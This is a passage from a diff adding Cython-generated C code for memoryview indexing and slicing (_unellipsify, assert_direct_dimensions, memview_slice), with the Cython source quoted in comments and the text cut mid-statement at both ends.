PyList_SET_ITEM(__pyx_t_1, __pyx_temp, __pyx_slice__7); + } + } + __pyx_v_result = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "View.MemoryView":680 + * + * result = [slice(None)] * ndim + * have_slices = False # <<<<<<<<<<<<<< + * seen_ellipsis = False + * idx = 0 + */ + __pyx_v_have_slices = 0; + + /* "View.MemoryView":681 + * result = [slice(None)] * ndim + * have_slices = False + * seen_ellipsis = False # <<<<<<<<<<<<<< + * idx = 0 + * for item in tup: + */ + __pyx_v_seen_ellipsis = 0; + + /* "View.MemoryView":682 + * have_slices = False + * seen_ellipsis = False + * idx = 0 # <<<<<<<<<<<<<< + * for item in tup: + * if item is Ellipsis: + */ + __pyx_v_idx = 0; + + /* "View.MemoryView":683 + * seen_ellipsis = False + * idx = 0 + * for item in tup: # <<<<<<<<<<<<<< + * if item is Ellipsis: + * if not seen_ellipsis: + */ + if (unlikely(__pyx_v_tup == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not iterable"); + __PYX_ERR(1, 683, __pyx_L1_error) + } + __pyx_t_1 = __pyx_v_tup; __Pyx_INCREF(__pyx_t_1); __pyx_t_4 = 0; + for (;;) { + if (__pyx_t_4 >= PyTuple_GET_SIZE(__pyx_t_1)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_3 = PyTuple_GET_ITEM(__pyx_t_1, __pyx_t_4); __Pyx_INCREF(__pyx_t_3); __pyx_t_4++; if (unlikely((0 < 0))) __PYX_ERR(1, 683, __pyx_L1_error) + #else + __pyx_t_3 = PySequence_ITEM(__pyx_t_1, __pyx_t_4); __pyx_t_4++; if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 683, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + #endif + __Pyx_XDECREF_SET(__pyx_v_item, __pyx_t_3); + __pyx_t_3 = 0; + + /* "View.MemoryView":684 + * idx = 0 + * for item in tup: + * if item is Ellipsis: # <<<<<<<<<<<<<< + * if not seen_ellipsis: + * idx += ndim - len(tup) + */ + __pyx_t_2 = (__pyx_v_item == __pyx_builtin_Ellipsis); + if (__pyx_t_2) { + + /* "View.MemoryView":685 + * for item in tup: + * if item is Ellipsis: + * if not seen_ellipsis: # <<<<<<<<<<<<<< + * idx += ndim - len(tup) + * seen_ellipsis = True + */ + __pyx_t_2 = (!__pyx_v_seen_ellipsis); + if (__pyx_t_2) { + + /* "View.MemoryView":686 + * if item is Ellipsis: + * if not seen_ellipsis: + * idx += ndim - len(tup) # <<<<<<<<<<<<<< + * seen_ellipsis = True + * have_slices = True + */ + if (unlikely(__pyx_v_tup == Py_None)) { + PyErr_SetString(PyExc_TypeError, "object of type 'NoneType' has no len()"); + __PYX_ERR(1, 686, __pyx_L1_error) + } + __pyx_t_5 = PyTuple_GET_SIZE(__pyx_v_tup); if (unlikely(__pyx_t_5 == ((Py_ssize_t)-1))) __PYX_ERR(1, 686, __pyx_L1_error) + __pyx_v_idx = (__pyx_v_idx + (__pyx_v_ndim - __pyx_t_5)); + + /* "View.MemoryView":687 + * if not seen_ellipsis: + * idx += ndim - len(tup) + * seen_ellipsis = True # <<<<<<<<<<<<<< + * have_slices = True + * else: + */ + __pyx_v_seen_ellipsis = 1; + + /* "View.MemoryView":685 + * for item in tup: + * if item is Ellipsis: + * if not seen_ellipsis: # <<<<<<<<<<<<<< + * idx += ndim - len(tup) + * seen_ellipsis = True + */ + } + + /* "View.MemoryView":688 + * idx += ndim - len(tup) + * seen_ellipsis = True + * have_slices = True # <<<<<<<<<<<<<< + * else: + * if isinstance(item, slice): + */ + __pyx_v_have_slices = 1; + + /* "View.MemoryView":684 + * idx = 0 + * for item in tup: + * if item is Ellipsis: # <<<<<<<<<<<<<< + * if not seen_ellipsis: + * idx += ndim - len(tup) + */ + goto __pyx_L5; + } + + /* "View.MemoryView":690 + * have_slices = True + * else: + * if isinstance(item, slice): # <<<<<<<<<<<<<< + * have_slices = True + * elif not PyIndex_Check(item): + */ + /*else*/ { + __pyx_t_2 = PySlice_Check(__pyx_v_item); + if (__pyx_t_2) { + + /* "View.MemoryView":691 + * else: + * if isinstance(item, slice): + * have_slices = True # <<<<<<<<<<<<<< + * elif not PyIndex_Check(item): + * raise TypeError, f"Cannot index with type '{type(item)}'" + */ + __pyx_v_have_slices = 1; + + /* "View.MemoryView":690 + * have_slices = True + * else: + * if isinstance(item, slice): # <<<<<<<<<<<<<< + * have_slices = True + * elif not PyIndex_Check(item): + */ + goto __pyx_L7; + } + + /* "View.MemoryView":692 + * if isinstance(item, slice): + * have_slices = True + * elif not PyIndex_Check(item): # <<<<<<<<<<<<<< + * raise TypeError, f"Cannot index with type '{type(item)}'" + * result[idx] = item + */ + __pyx_t_2 = (!(PyIndex_Check(__pyx_v_item) != 0)); + if (unlikely(__pyx_t_2)) { + + /* "View.MemoryView":693 + * have_slices = True + * elif not PyIndex_Check(item): + * raise TypeError, f"Cannot index with type '{type(item)}'" # <<<<<<<<<<<<<< + * result[idx] = item + * idx += 1 + */ + __pyx_t_3 = PyTuple_New(3); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 693, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_5 = 0; + __pyx_t_6 = 127; + __Pyx_INCREF(__pyx_kp_u_Cannot_index_with_type); + __pyx_t_5 += 24; + __Pyx_GIVEREF(__pyx_kp_u_Cannot_index_with_type); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_kp_u_Cannot_index_with_type); + __pyx_t_7 = __Pyx_PyObject_FormatSimple(((PyObject *)Py_TYPE(__pyx_v_item)), __pyx_empty_unicode); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 693, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_t_6 = (__Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_7) > __pyx_t_6) ? __Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_7) : __pyx_t_6; + __pyx_t_5 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_7); + __Pyx_GIVEREF(__pyx_t_7); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_7); + __pyx_t_7 = 0; + __Pyx_INCREF(__pyx_kp_u__8); + __pyx_t_5 += 1; + __Pyx_GIVEREF(__pyx_kp_u__8); + PyTuple_SET_ITEM(__pyx_t_3, 2, __pyx_kp_u__8); + __pyx_t_7 = __Pyx_PyUnicode_Join(__pyx_t_3, 3, __pyx_t_5, __pyx_t_6); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 693, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_t_7, 0, 0); + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + __PYX_ERR(1, 693, __pyx_L1_error) + + /* "View.MemoryView":692 + * if isinstance(item, slice): + * have_slices = True + * elif not PyIndex_Check(item): # <<<<<<<<<<<<<< + * raise TypeError, f"Cannot index with type '{type(item)}'" + * result[idx] = item + */ + } + __pyx_L7:; + + /* "View.MemoryView":694 + * elif not PyIndex_Check(item): + * raise TypeError, f"Cannot index with type '{type(item)}'" + * result[idx] = item # <<<<<<<<<<<<<< + * idx += 1 + * + */ + if (unlikely((__Pyx_SetItemInt(__pyx_v_result, __pyx_v_idx, __pyx_v_item, Py_ssize_t, 1, PyInt_FromSsize_t, 1, 1, 1) < 0))) __PYX_ERR(1, 694, __pyx_L1_error) + } + __pyx_L5:; + + /* "View.MemoryView":695 + * raise TypeError, f"Cannot index with type '{type(item)}'" + * result[idx] = item + * idx += 1 # <<<<<<<<<<<<<< + * + * nslices = ndim - idx + */ + __pyx_v_idx = (__pyx_v_idx + 1); + + /* "View.MemoryView":683 + * seen_ellipsis = False + * idx = 0 + * for item in tup: # <<<<<<<<<<<<<< + * if item is Ellipsis: + * if not seen_ellipsis: + */ + } + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "View.MemoryView":697 + * idx += 1 + * + * nslices = ndim - idx # <<<<<<<<<<<<<< + * return have_slices or nslices, tuple(result) + * + */ + __pyx_v_nslices = (__pyx_v_ndim - __pyx_v_idx); + + /* "View.MemoryView":698 + * + * nslices = ndim - idx + * return have_slices or nslices, tuple(result) # <<<<<<<<<<<<<< + * + * cdef int assert_direct_dimensions(Py_ssize_t *suboffsets, int ndim) except -1: + */ + __Pyx_XDECREF(__pyx_r); + if (!__pyx_v_have_slices) { + } else { + __pyx_t_7 = __Pyx_PyBool_FromLong(__pyx_v_have_slices); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 698, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_t_1 = __pyx_t_7; + __pyx_t_7 = 0; + goto __pyx_L9_bool_binop_done; + } + __pyx_t_7 = PyInt_FromSsize_t(__pyx_v_nslices); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 698, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_t_1 = __pyx_t_7; + __pyx_t_7 = 0; + __pyx_L9_bool_binop_done:; + __pyx_t_7 = PyList_AsTuple(__pyx_v_result); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 698, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 698, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_t_1); + __Pyx_GIVEREF(__pyx_t_7); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_7); + __pyx_t_1 = 0; + __pyx_t_7 = 0; + __pyx_r = ((PyObject*)__pyx_t_3); + __pyx_t_3 = 0; + goto __pyx_L0; + + /* "View.MemoryView":671 + * return isinstance(o, memoryview) + * + * cdef tuple _unellipsify(object index, int ndim): # <<<<<<<<<<<<<< + * """ + * Replace all ellipses with full slices and fill incomplete indices with + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_AddTraceback("View.MemoryView._unellipsify", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_tup); + __Pyx_XDECREF(__pyx_v_result); + __Pyx_XDECREF(__pyx_v_item); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":700 + * return have_slices or nslices, tuple(result) + * + * cdef int assert_direct_dimensions(Py_ssize_t *suboffsets, int ndim) except -1: # <<<<<<<<<<<<<< + * for suboffset in suboffsets[:ndim]: + * if suboffset >= 0: + */ + +static int assert_direct_dimensions(Py_ssize_t *__pyx_v_suboffsets, int __pyx_v_ndim) { + Py_ssize_t __pyx_v_suboffset; + int __pyx_r; + __Pyx_RefNannyDeclarations + Py_ssize_t *__pyx_t_1; + Py_ssize_t *__pyx_t_2; + Py_ssize_t *__pyx_t_3; + int __pyx_t_4; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("assert_direct_dimensions", 0); + + /* "View.MemoryView":701 + * + * cdef int assert_direct_dimensions(Py_ssize_t *suboffsets, int ndim) except -1: + * for suboffset in suboffsets[:ndim]: # <<<<<<<<<<<<<< + * if suboffset >= 0: + * raise ValueError, "Indirect dimensions not supported" + */ + __pyx_t_2 = (__pyx_v_suboffsets + __pyx_v_ndim); + for (__pyx_t_3 = __pyx_v_suboffsets; __pyx_t_3 < __pyx_t_2; __pyx_t_3++) { + __pyx_t_1 = __pyx_t_3; + __pyx_v_suboffset = (__pyx_t_1[0]); + + /* "View.MemoryView":702 + * cdef int assert_direct_dimensions(Py_ssize_t *suboffsets, int ndim) except -1: + * for suboffset in suboffsets[:ndim]: + * if suboffset >= 0: # <<<<<<<<<<<<<< + * raise ValueError, "Indirect dimensions not supported" + * return 0 # return type just used as an error flag + */ + __pyx_t_4 = (__pyx_v_suboffset >= 0); + if (unlikely(__pyx_t_4)) { + + /* "View.MemoryView":703 + * for suboffset in suboffsets[:ndim]: + * if suboffset >= 0: + * raise ValueError, "Indirect dimensions not supported" # <<<<<<<<<<<<<< + * return 0 # return type just used as an error flag + * + */ + __Pyx_Raise(__pyx_builtin_ValueError, __pyx_kp_s_Indirect_dimensions_not_supporte, 0, 0); + __PYX_ERR(1, 703, __pyx_L1_error) + + /* "View.MemoryView":702 + * cdef int assert_direct_dimensions(Py_ssize_t *suboffsets, int ndim) except -1: + * for suboffset in suboffsets[:ndim]: + * if suboffset >= 0: # <<<<<<<<<<<<<< + * raise ValueError, "Indirect dimensions not supported" + * return 0 # return type just used as an error flag + */ + } + } + + /* "View.MemoryView":704 + * if suboffset >= 0: + * raise ValueError, "Indirect dimensions not supported" + * return 0 # return type just used as an error flag # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = 0; + goto __pyx_L0; + + /* "View.MemoryView":700 + * return have_slices or nslices, tuple(result) + * + * cdef int assert_direct_dimensions(Py_ssize_t *suboffsets, int ndim) except -1: # <<<<<<<<<<<<<< + * for suboffset in suboffsets[:ndim]: + * if suboffset >= 0: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView.assert_direct_dimensions", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":711 + * + * @cname('__pyx_memview_slice') + * cdef memoryview memview_slice(memoryview memview, object indices): # <<<<<<<<<<<<<< + * cdef int new_ndim = 0, suboffset_dim = -1, dim + * cdef bint negative_step + */ + +static struct __pyx_memoryview_obj *__pyx_memview_slice(struct __pyx_memoryview_obj *__pyx_v_memview, PyObject *__pyx_v_indices) { + int __pyx_v_new_ndim; + int __pyx_v_suboffset_dim; + int __pyx_v_dim; + __Pyx_memviewslice __pyx_v_src; + __Pyx_memviewslice __pyx_v_dst; + __Pyx_memviewslice *__pyx_v_p_src; + struct __pyx_memoryviewslice_obj *__pyx_v_memviewsliceobj = 0; + __Pyx_memviewslice *__pyx_v_p_dst; + int *__pyx_v_p_suboffset_dim; + Py_ssize_t __pyx_v_start; + Py_ssize_t __pyx_v_stop; + Py_ssize_t __pyx_v_step; + Py_ssize_t __pyx_v_cindex; + int __pyx_v_have_start; + int __pyx_v_have_stop; + int __pyx_v_have_step; + PyObject *__pyx_v_index = NULL; + struct __pyx_memoryview_obj *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + struct __pyx_memoryview_obj *__pyx_t_3; + char *__pyx_t_4; + int __pyx_t_5; + Py_ssize_t __pyx_t_6; + PyObject *(*__pyx_t_7)(PyObject *); + PyObject *__pyx_t_8 = NULL; + Py_ssize_t __pyx_t_9; + int __pyx_t_10; + Py_ssize_t __pyx_t_11; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("memview_slice", 0); + + /* "View.MemoryView":712 + * @cname('__pyx_memview_slice') + * cdef memoryview memview_slice(memoryview memview, object indices): + * cdef int new_ndim = 0, suboffset_dim = -1, dim # <<<<<<<<<<<<<< + * cdef bint negative_step + * cdef __Pyx_memviewslice src, dst + */ + __pyx_v_new_ndim = 0; + __pyx_v_suboffset_dim = -1; + + /* "View.MemoryView":719 + * + * + * memset(&dst, 0, sizeof(dst)) # <<<<<<<<<<<<<< + * + * cdef _memoryviewslice memviewsliceobj + */ + (void)(memset((&__pyx_v_dst), 0, (sizeof(__pyx_v_dst)))); + + /* "View.MemoryView":723 + * cdef _memoryviewslice memviewsliceobj + * + * assert memview.view.ndim > 0 # <<<<<<<<<<<<<< + * + * if isinstance(memview, _memoryviewslice): + */ + #ifndef CYTHON_WITHOUT_ASSERTIONS + if (unlikely(__pyx_assertions_enabled())) { + __pyx_t_1 = (__pyx_v_memview->view.ndim > 0); + if (unlikely(!__pyx_t_1)) { + __Pyx_Raise(__pyx_builtin_AssertionError, 0, 0, 0); + __PYX_ERR(1, 723, __pyx_L1_error) + } + } + #else + if ((1)); else __PYX_ERR(1, 723, __pyx_L1_error) + #endif + + /* "View.MemoryView":725 + * assert memview.view.ndim > 0 + * + * if isinstance(memview, _memoryviewslice): # <<<<<<<<<<<<<< + * memviewsliceobj = memview + * p_src = &memviewsliceobj.from_slice + */ + __pyx_t_1 = __Pyx_TypeCheck(((PyObject *)__pyx_v_memview), __pyx_memoryviewslice_type); + if (__pyx_t_1) { + + /* "View.MemoryView":726 + * + * if isinstance(memview, _memoryviewslice): + * memviewsliceobj = memview # <<<<<<<<<<<<<< + * p_src = &memviewsliceobj.from_slice + * else: + */ + if (!(likely(((((PyObject *)__pyx_v_memview)) == Py_None) || likely(__Pyx_TypeTest(((PyObject *)__pyx_v_memview), __pyx_memoryviewslice_type))))) __PYX_ERR(1, 726, __pyx_L1_error) + __pyx_t_2 = ((PyObject *)__pyx_v_memview); + __Pyx_INCREF(__pyx_t_2); + __pyx_v_memviewsliceobj = ((struct __pyx_memoryviewslice_obj *)__pyx_t_2); + __pyx_t_2 = 0; + + /* "View.MemoryView":727 + * if isinstance(memview, _memoryviewslice): + * memviewsliceobj = memview + * p_src = &memviewsliceobj.from_slice # <<<<<<<<<<<<<< + * else: + * slice_copy(memview, &src) + */ + __pyx_v_p_src = (&__pyx_v_memviewsliceobj->from_slice); + + /* "View.MemoryView":725 + * assert memview.view.ndim > 0 + * + * if isinstance(memview, _memoryviewslice): # <<<<<<<<<<<<<< + * memviewsliceobj = memview + * p_src = &memviewsliceobj.from_slice + */ + goto __pyx_L3; + } + + /* "View.MemoryView":729 + * p_src = &memviewsliceobj.from_slice + * else: + * slice_copy(memview, &src) # <<<<<<<<<<<<<< + * p_src = &src + * + */ + /*else*/ { + __pyx_memoryview_slice_copy(__pyx_v_memview, (&__pyx_v_src)); + + /* "View.MemoryView":730 + * else: + * slice_copy(memview, &src) + * p_src = &src # <<<<<<<<<<<<<< + * + * + */ + __pyx_v_p_src = (&__pyx_v_src); + } + __pyx_L3:; + + /* "View.MemoryView":736 + * + * + * dst.memview = p_src.memview # <<<<<<<<<<<<<< + * dst.data = p_src.data + * + */ + __pyx_t_3 = __pyx_v_p_src->memview; + __pyx_v_dst.memview = __pyx_t_3; + + /* "View.MemoryView":737 + * + * dst.memview = p_src.memview + * dst.data = p_src.data # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_4 = __pyx_v_p_src->data; + __pyx_v_dst.data = __pyx_t_4; + + /* "View.MemoryView":742 + * + * + * cdef __Pyx_memviewslice *p_dst = &dst # <<<<<<<<<<<<<< + * cdef int *p_suboffset_dim = &suboffset_dim + * cdef Py_ssize_t start, stop, step, cindex + */ + __pyx_v_p_dst = (&__pyx_v_dst); + + /* "View.MemoryView":743 + * + * cdef __Pyx_memviewslice *p_dst = &dst + * cdef int *p_suboffset_dim = &suboffset_dim # <<<<<<<<<<<<<< + * cdef Py_ssize_t start, stop, step, cindex + * cdef bint have_start, have_stop, have_step + */ + __pyx_v_p_suboffset_dim = (&__pyx_v_suboffset_dim); + + /* "View.MemoryView":747 + * cdef bint have_start, have_stop, have_step + * + * for dim, index in enumerate(indices): # <<<<<<<<<<<<<< + * if PyIndex_Check(index): + * cindex = index + */ + __pyx_t_5 = 0; + if (likely(PyList_CheckExact(__pyx_v_indices)) || PyTuple_CheckExact(__pyx_v_indices)) { + __pyx_t_2 = __pyx_v_indices; __Pyx_INCREF(__pyx_t_2); __pyx_t_6 = 0; + __pyx_t_7 = NULL; + } else { + __pyx_t_6 = -1; __pyx_t_2 = PyObject_GetIter(__pyx_v_indices); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 747, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_7 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_2); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 747, __pyx_L1_error) + } + for (;;) { + if (likely(!__pyx_t_7)) { + if (likely(PyList_CheckExact(__pyx_t_2))) { + if (__pyx_t_6 >= PyList_GET_SIZE(__pyx_t_2)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_8 = PyList_GET_ITEM(__pyx_t_2, __pyx_t_6); __Pyx_INCREF(__pyx_t_8); __pyx_t_6++; if (unlikely((0 < 0))) __PYX_ERR(1, 747, __pyx_L1_error) + #else + __pyx_t_8 = PySequence_ITEM(__pyx_t_2, __pyx_t_6); __pyx_t_6++; if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 747, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + #endif + } else { + if (__pyx_t_6 >= PyTuple_GET_SIZE(__pyx_t_2)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_8 = PyTuple_GET_ITEM(__pyx_t_2, __pyx_t_6); __Pyx_INCREF(__pyx_t_8); __pyx_t_6++; if (unlikely((0 < 0))) __PYX_ERR(1, 747, __pyx_L1_error) + #else + __pyx_t_8 = PySequence_ITEM(__pyx_t_2, __pyx_t_6); __pyx_t_6++; if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 747, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + #endif + } + } else { + __pyx_t_8 = __pyx_t_7(__pyx_t_2); + if (unlikely(!__pyx_t_8)) { + PyObject* exc_type = PyErr_Occurred(); + if (exc_type) { + if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); + else __PYX_ERR(1, 747, __pyx_L1_error) + } + break; + } + __Pyx_GOTREF(__pyx_t_8); + } + __Pyx_XDECREF_SET(__pyx_v_index, __pyx_t_8); + __pyx_t_8 = 0; + __pyx_v_dim = __pyx_t_5; + __pyx_t_5 = (__pyx_t_5 + 1); + + /* "View.MemoryView":748 + * + * for dim, index in enumerate(indices): + * if PyIndex_Check(index): # <<<<<<<<<<<<<< + * cindex = index + * slice_memviewslice( + */ + __pyx_t_1 = (PyIndex_Check(__pyx_v_index) != 0); + if (__pyx_t_1) { + + /* "View.MemoryView":749 + * for dim, index in enumerate(indices): + * if PyIndex_Check(index): + * cindex = index # <<<<<<<<<<<<<< + * slice_memviewslice( + * p_dst, p_src.shape[dim], p_src.strides[dim], p_src.suboffsets[dim], + */ + __pyx_t_9 = __Pyx_PyIndex_AsSsize_t(__pyx_v_index); if (unlikely((__pyx_t_9 == (Py_ssize_t)-1) && PyErr_Occurred())) __PYX_ERR(1, 749, __pyx_L1_error) + __pyx_v_cindex = __pyx_t_9; + + /* "View.MemoryView":750 + * if PyIndex_Check(index): + * cindex = index + * slice_memviewslice( # <<<<<<<<<<<<<< + * p_dst, p_src.shape[dim], p_src.strides[dim], p_src.suboffsets[dim], + * dim, new_ndim, p_suboffset_dim, + */ + __pyx_t_10 = __pyx_memoryview_slice_memviewslice(__pyx_v_p_dst, (__pyx_v_p_src->shape[__pyx_v_dim]), (__pyx_v_p_src->strides[__pyx_v_dim]), (__pyx_v_p_src->suboffsets[__pyx_v_dim]), __pyx_v_dim, __pyx_v_new_ndim, __pyx_v_p_suboffset_dim, __pyx_v_cindex, 0, 0, 0, 0, 0, 0); if (unlikely(__pyx_t_10 == ((int)-1))) __PYX_ERR(1, 750, __pyx_L1_error) + + /* "View.MemoryView":748 + * + * for dim, index in enumerate(indices): + * if PyIndex_Check(index): # <<<<<<<<<<<<<< + * cindex = index + * slice_memviewslice( + */ + goto __pyx_L6; + } + + /* "View.MemoryView":756 + * 0, 0, 0, # have_{start,stop,step} + * False) + * elif index is None: # <<<<<<<<<<<<<< + * p_dst.shape[new_ndim] = 1 + * p_dst.strides[new_ndim] = 0 + */ + __pyx_t_1 = (__pyx_v_index == Py_None); + if (__pyx_t_1) { + + /* "View.MemoryView":757 + * False) + * elif index is None: + * p_dst.shape[new_ndim] = 1 # <<<<<<<<<<<<<< + * p_dst.strides[new_ndim] = 0 + * p_dst.suboffsets[new_ndim] = -1 + */ + (__pyx_v_p_dst->shape[__pyx_v_new_ndim]) = 1; + + /* "View.MemoryView":758 + * elif index is None: + * p_dst.shape[new_ndim] = 1 + * p_dst.strides[new_ndim] = 0 # <<<<<<<<<<<<<< + * p_dst.suboffsets[new_ndim] = -1 + * new_ndim += 1 + */ + (__pyx_v_p_dst->strides[__pyx_v_new_ndim]) = 0; + + /* "View.MemoryView":759 + * p_dst.shape[new_ndim] = 1 + * p_dst.strides[new_ndim] = 0 + * p_dst.suboffsets[new_ndim] = -1 # <<<<<<<<<<<<<< + * new_ndim += 1 + * else: + */ + (__pyx_v_p_dst->suboffsets[__pyx_v_new_ndim]) = -1L; + + /* "View.MemoryView":760 + * p_dst.strides[new_ndim] = 0 + * p_dst.suboffsets[new_ndim] = -1 + * new_ndim += 1 # <<<<<<<<<<<<<< + * else: + * start = index.start or 0 + */ + __pyx_v_new_ndim = (__pyx_v_new_ndim + 1); + + /* "View.MemoryView":756 + * 0, 0, 0, # have_{start,stop,step} + * False) + * elif index is None: # <<<<<<<<<<<<<< + * p_dst.shape[new_ndim] = 1 + * p_dst.strides[new_ndim] = 0 + */ + goto __pyx_L6; + } + + /* "View.MemoryView":762 + * new_ndim += 1 + * else: + * start = index.start or 0 # <<<<<<<<<<<<<< + * stop = index.stop or 0 + * step = index.step or 0 + */ + /*else*/ { + __pyx_t_8 = __Pyx_PyObject_GetAttrStr(__pyx_v_index, __pyx_n_s_start); if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 762, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __pyx_t_1 = __Pyx_PyObject_IsTrue(__pyx_t_8); if (unlikely((__pyx_t_1 < 0))) __PYX_ERR(1, 762, __pyx_L1_error) + if (!__pyx_t_1) { + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + } else { + __pyx_t_11 = __Pyx_PyIndex_AsSsize_t(__pyx_t_8); if (unlikely((__pyx_t_11 == (Py_ssize_t)-1) && PyErr_Occurred())) __PYX_ERR(1, 762, __pyx_L1_error) + __pyx_t_9 = __pyx_t_11; + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + goto __pyx_L7_bool_binop_done; + } + __pyx_t_9 = 0; + __pyx_L7_bool_binop_done:; + __pyx_v_start = __pyx_t_9; + + /* "View.MemoryView":763 + * else: + * start = index.start or 0 + * stop = index.stop or 0 # <<<<<<<<<<<<<< + * step = index.step or 0 + * + */ + __pyx_t_8 = __Pyx_PyObject_GetAttrStr(__pyx_v_index, __pyx_n_s_stop); if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 763, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __pyx_t_1 = __Pyx_PyObject_IsTrue(__pyx_t_8); if (unlikely((__pyx_t_1 < 0))) __PYX_ERR(1, 763, __pyx_L1_error) + if (!__pyx_t_1) { + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + } else { + __pyx_t_11 = __Pyx_PyIndex_AsSsize_t(__pyx_t_8); if (unlikely((__pyx_t_11 == (Py_ssize_t)-1) && PyErr_Occurred())) __PYX_ERR(1, 763, __pyx_L1_error) + __pyx_t_9 = __pyx_t_11; + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + goto __pyx_L9_bool_binop_done; + } + __pyx_t_9 = 0; + __pyx_L9_bool_binop_done:; + __pyx_v_stop = __pyx_t_9; + + /* "View.MemoryView":764 + * start = index.start or 0 + * stop = index.stop or 0 + * step = index.step or 0 # <<<<<<<<<<<<<< + * + * have_start = index.start is not None + */ + __pyx_t_8 = __Pyx_PyObject_GetAttrStr(__pyx_v_index, __pyx_n_s_step); if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 764, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __pyx_t_1 = __Pyx_PyObject_IsTrue(__pyx_t_8); if (unlikely((__pyx_t_1 < 0))) __PYX_ERR(1, 764, __pyx_L1_error) + if (!__pyx_t_1) { + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + } else { + __pyx_t_11 = __Pyx_PyIndex_AsSsize_t(__pyx_t_8); if (unlikely((__pyx_t_11 == (Py_ssize_t)-1) && PyErr_Occurred())) __PYX_ERR(1, 764, __pyx_L1_error) + __pyx_t_9 = __pyx_t_11; + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + goto __pyx_L11_bool_binop_done; + } + __pyx_t_9 = 0; + __pyx_L11_bool_binop_done:; + __pyx_v_step = __pyx_t_9; + + /* "View.MemoryView":766 + * step = index.step or 0 + * + * have_start = index.start is not None # <<<<<<<<<<<<<< + * have_stop = index.stop is not None + * have_step = index.step is not None + */ + __pyx_t_8 = __Pyx_PyObject_GetAttrStr(__pyx_v_index, __pyx_n_s_start); if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 766, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __pyx_t_1 = (__pyx_t_8 != Py_None); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __pyx_v_have_start = __pyx_t_1; + + /* "View.MemoryView":767 + * + * have_start = index.start is not None + * have_stop = index.stop is not None # <<<<<<<<<<<<<< + * have_step = index.step is not None + * + */ + __pyx_t_8 = 